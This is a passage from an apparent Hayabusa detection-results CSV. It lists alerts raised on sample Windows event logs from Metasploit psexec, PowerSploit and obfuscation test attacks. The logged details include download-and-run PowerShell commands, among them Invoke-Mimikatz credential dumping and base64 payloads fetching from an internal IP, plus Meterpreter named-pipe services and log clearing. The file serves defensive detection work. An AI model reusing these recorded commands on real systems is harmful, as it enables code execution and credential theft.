K2JRzGIoMlKV2kTfmdRN/KZfBaKIGaO+CzutIRGwEgNgipgSAYT4mH4laxJR81aMeKB3KG6DYRdK+VQQBx5hl9jpH6NMCH9kd4xHAsSzGCHJJuMiI/VpIOCOiLE9cunPg3h2RxzCKQbklBQ5qZyJvhMxz1MMF+dHfp4wOiASCEDDCLin45BcFEwRAFbyR/WOFhE8o5rPmpa+pDm0oblaE/49el7jpUu7fruoqkFpO3dQLaw1q+1Sp1otrG/NfkGY5Zqot2uiWR4uFiaq3vdGYlxD1S7VlqPCfnVL92YD2aOterHX9xtN3+4Xru2MSo7jXjrmfe6zQRuDYkfX8rhRKkeNgb7RtUJYpptqh/Y6y1tDzEZ9hnuO6g5z15huG8Gin+PNfQ2hyvzc2t86/cq8ae9GVfV6UFiiMkJFv9w3dF4f6QFqq33s9vmmvqiwgVtEumFRMu70DL3TMXTUqyweSteqC7ZDPNcH/Twdr4b3c5gbEEJd1Qo1m+z5qAMgVTjC7j3ouMW8NXdAp/QJ6Z9aPMzjpc6RDjrG+AHiGq2MNgN5t5fnqM9aQ4wa452hqrlRu4CqGh1UXBRviV29g1G4Lu1Laq5vc3vwuTVy1P6QXaqlYndlOaqqbqqlujXOba/uLgu69lD0qMdmeVu97l3p/qbutteu3Rlc3m9buxn466lq/2PMGqBNavHZu9IuF8/o8Ktrv4mDcI4Z0ATu86RQDR4Ypyu5zWlsIcvPuvWSBD5h0Nyg/SV8R4xxK+4TL65w6FXHDjKF4u3B8Dz/6kiRHhWVpz6SLN3cjCFmqKMjybMN4rtintG255oG97+2LWhw8LeftMhXO/m0WSbuIAleTy7YwYUSl1hqMdg0L5bV1f+B5qnE5/Cy34rm09pvpG9CWMs8IvGT5OXCf8L7D7EYYCpA34Qri5FjA/09JCcuPfsQSVIHXHFOT/wxeBeJsxZ8o/wLs66tlosKAAA='));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x5fc | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx 2016-09-21 01:35:58.162 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: genusn | Path: cmd.exe /c echo genusn > \\.\pipe\genusn,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx 2016-09-21 01:35:58.162 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: genusn | Path: cmd.exe /c echo genusn > \\.\pipe\genusn | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx 2016-09-21 01:35:58.162 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: genusn | Path: cmd.exe /c echo genusn > \\.\pipe\genusn | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx 2016-09-21 01:35:58.169 +09:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo genusn > \\.\pipe\genusn | Path: C:\Windows\System32\cmd.exe | PID: 0xe8c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_MeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx 2016-09-21 01:35:58.169 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /c echo genusn > \\.\pipe\genusn | Path: C:\Windows\System32\cmd.exe | PID: 0xe8c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx 2016-09-21 03:27:25.424 +09:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx 2016-09-21 03:27:39.918 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdec | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx 2016-09-21 03:27:42.755 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x620 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx 2016-09-21 03:27:42.802 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3bc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx 2016-09-21 03:27:44.943 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\g4g34pot.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xc58 | User: IEUser | LID: 0x6793c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx 2016-09-21 03:28:55.689 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x234 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx 2016-09-21 03:28:55.705 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x924 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx 2016-09-21 03:28:58.267 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\wlqywrdm.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x71c | User: IEUser | LID: 0x6793c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx 2016-09-21 03:33:13.923 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\0xqpayvt.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x920 | User: IEUser | LID: 0x6793c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx 2016-09-21 03:41:27.017 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\kwos13rh.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x760 | User: IEUser | LID: 0x6793c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx 2016-09-21 03:45:16.455 +09:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx 2016-09-21 03:45:24.408 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9a0 | User: IEUser | LID: 0x6793c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx 2016-09-21 03:45:24.408 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx 2016-09-21 03:45:48.501 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('http://eic.me/17'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x700 | User: IEUser | LID: 0x6793c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx 2016-09-21 03:45:48.501 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx 2016-09-21 04:15:32.581 +09:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx 2016-09-21 04:15:49.846 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe80 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx 2016-09-21 04:15:53.753 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x620 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx 2016-09-21 04:15:53.785 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xea8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx 2016-09-21 04:15:53.847 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x200 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx 2016-09-21 04:15:54.128 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: powershell.exe -NoP -sta -NonI -W Hidden -Enc WwBTAFkAUwB0AEUAbQAuAE4ARQBUAC4AUwBFAHIAdgBJAEMAZQBQAG8AaQBOAFQATQBBAE4AYQBHAEUAcgBdADoAOgBFAFgAUABlAEMAVAAxADAAMABDAG8AbgBUAGkAbgB1AEUAIAA9ACAAMAA7ACQAVwBjAD0ATgBlAHcALQBPAGIASgBlAGMAVAAgAFMAWQBTAHQAZQBNAC4ATgBFAFQALgBXAGUAQgBDAGwAaQBFAE4AVAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHcAYwAuAEgARQBBAEQAZQBSAHMALgBBAGQARAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAFcAQwAuAFAAcgBPAHgAeQAgAD0AIABbAFMAeQBzAFQAZQBtAC4ATgBlAFQALgBXAEUAQgBSAGUAcQB1AEUAUwB0AF0AOgA6AEQAZQBmAGEAdQBMAFQAVwBlAEIAUABSAG8AeAB5ADsAJABXAGMALgBQAFIATwB4AFkALgBDAFIARQBEAGUATgBUAEkAYQBMAHMAIAA9ACAAWwBTAFkAcwBUAEUAbQAuAE4AZQB0AC4AQwByAGUARABlAG4AdABJAEEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQBVAEwAVABOAGUAVAB3AG8AcgBrAEMAcgBFAEQAZQBuAFQASQBhAEwAcwA7ACQASwA9ACcAcwB5AHwAUgA0AFgAaABCAFcAbwB6AEsALgB4AC0ANgArADkAPgBJAGkAcQA3AEQAOABgAEoATABuAGwAdwBWACcAOwAkAEkAPQAwADsAWwBDAEgAYQBSAFsAXQBdACQAQgA9ACgAWwBDAGgAQQBSAFsAXQBdACgAJAB3AGMALgBEAE8AdwBuAGwAbwBhAEQAUwBUAHIASQBOAEcAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEAOQA4AC4AMQA0ADkAOgA4ADAAOAAwAC8AaQBuAGQAZQB4AC4AYQBzAHAAIgApACkAKQB8ACUAewAkAF8ALQBCAFgATwBSACQAawBbACQAaQArACsAJQAkAGsALgBMAGUAbgBnAHQAaABdAH0AOwBJAEUAWAAgACgAJABCAC0ASgBPAEkATgAnACcAKQA= | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe68 | User: IEUser | LID: 0x6793c,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx 2016-09-21 04:15:54.128 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: cmd /c del ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x480 | User: IEUser | LID: 0x6793c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx 2016-09-21 04:19:22.128 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf9c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx 2016-09-21 04:19:26.543 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x990 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx 2016-09-21 04:19:26.575 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x160 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx 2016-09-21 04:19:26.637 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x98c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx 2016-09-21 04:19:26.903 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: powershell.exe -NoP -sta -NonI -W Hidden -Enc JABXAGMAPQBOAGUAdwAtAE8AQgBKAEUAQwBUACAAUwB5AFMAdABFAG0ALgBOAEUAVAAuAFcAZQBCAEMAbABJAGUATgB0ADsAJAB1AD0AJwBNAG8AegBpAGwAbABhAC8ANQAuADAAIAAoAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACAAVwBPAFcANgA0ADsAIABUAHIAaQBkAGUAbgB0AC8ANwAuADAAOwAgAHIAdgA6ADEAMQAuADAAKQAgAGwAaQBrAGUAIABHAGUAYwBrAG8AJwA7ACQAVwBDAC4ASABlAGEAZABFAHIAUwAuAEEAZABEACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAdwBjAC4AUAByAG8AWABZACAAPQAgAFsAUwBZAFMAVABFAG0ALgBOAGUAdAAuAFcAZQBiAFIARQBxAHUAZQBzAHQAXQA6ADoARABFAGYAQQB1AGwAdABXAGUAYgBQAFIATwBYAHkAOwAkAHcAQwAuAFAAcgBvAFgAeQAuAEMAcgBlAGQARQBOAFQASQBBAEwAUwAgAD0AIABbAFMAWQBzAFQAZQBNAC4ATgBlAFQALgBDAFIAZQBEAGUAbgB0AGkAQQBMAEMAQQBjAGgAZQBdADoAOgBEAGUARgBBAFUAbAB0AE4AZQB0AHcAbwByAEsAQwBSAEUAZABlAG4AVABJAGEAbABTADsAJABLAD0AJwApADAAZABoAEMAeQAxAEoAOQBzADMAcQBZAEAAJQBMACEANwBwAHUAXQBUAHwAdgBWAH0AdABuAFsAQQBRAFIAJwA7ACQAaQA9ADAAOwBbAEMASABBAHIAWwBdAF0AJABCAD0AKABbAGMASABhAHIAWwBdAF0AKAAkAFcAYwAuAEQAbwB3AG4ATABvAGEARABTAHQAUgBpAG4ARwAoACIAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQA5ADgALgAxADQAOQA6ADgAMAA4ADIALwBpAG4AZABlAHgALgBhAHMAcAAiACkAKQApAHwAJQB7ACQAXwAtAGIAWABPAHIAJABLAFsAJABJACsAKwAlACQASwAuAEwARQBuAEcAdABoAF0AfQA7AEkARQBYACAAKAAkAEIALQBqAG8AaQBOACcAJwApAA== | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x11c | User: IEUser | LID: 0x6793c,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx 2016-09-21 04:19:26.918 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: cmd /c del ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x7d0 | User: IEUser | LID: 0x6793c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx 2016-09-21 04:20:19.153 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc50 | User: IEUser | LID: 0x6793c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx 2016-09-21 12:40:37.088 +09:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx 2016-09-21 12:40:41.865 +09:00,IE10Win7,104,high,Evas,System Log File Cleared,User: IEUser,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx 2016-09-21 12:41:02.542 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: KgXItsbKgTJzdzwl | Path: %SYSTEMROOT%\duKhLYUX.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx 2016-09-21 12:41:02.542 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: KgXItsbKgTJzdzwl | Path: %SYSTEMROOT%\duKhLYUX.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx 2016-09-21 12:41:02.542 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: KgXItsbKgTJzdzwl | Path: %SYSTEMROOT%\duKhLYUX.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx 2016-09-21 12:41:13.070 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: hgabms | Path: cmd.exe /c echo hgabms > \\.\pipe\hgabms | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx 2016-09-21 12:41:13.070 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: hgabms | Path: cmd.exe /c echo hgabms > \\.\pipe\hgabms,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx 2016-09-21 12:41:13.070 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: hgabms | Path: cmd.exe /c echo hgabms > \\.\pipe\hgabms | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx 2016-09-21 12:41:13.078 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /c echo hgabms > \\.\pipe\hgabms | Path: C:\Windows\System32\cmd.exe | PID: 0x694 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx 2016-09-21 12:41:13.078 +09:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo hgabms > \\.\pipe\hgabms | Path: C:\Windows\System32\cmd.exe | PID: 0x694 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_MeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx 2017-06-10 04:21:26.968 +09:00,2016dc.hqcorp.local,4794,high,Persis,Password Change on Directory Service Restore Mode (DSRM) Account,,../hayabusa-rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/4794_DSRM_password_change_t1098.evtx 2017-06-13 08:39:43.512 +09:00,2012r2srv.maincorp.local,4765,medium,Persis | PrivEsc,Addition of SID History to Active Directory Object,,../hayabusa-rules/sigma/builtin/security/win_susp_add_sid_history.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4765_sidhistory_add_t1178.evtx 2017-08-31 01:31:49.876 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:31:49.908 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:31:57.382 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Exec,Malicious Nishang PowerShell Commandlets,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Invocations - Specific,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Exec,Malicious PowerShell 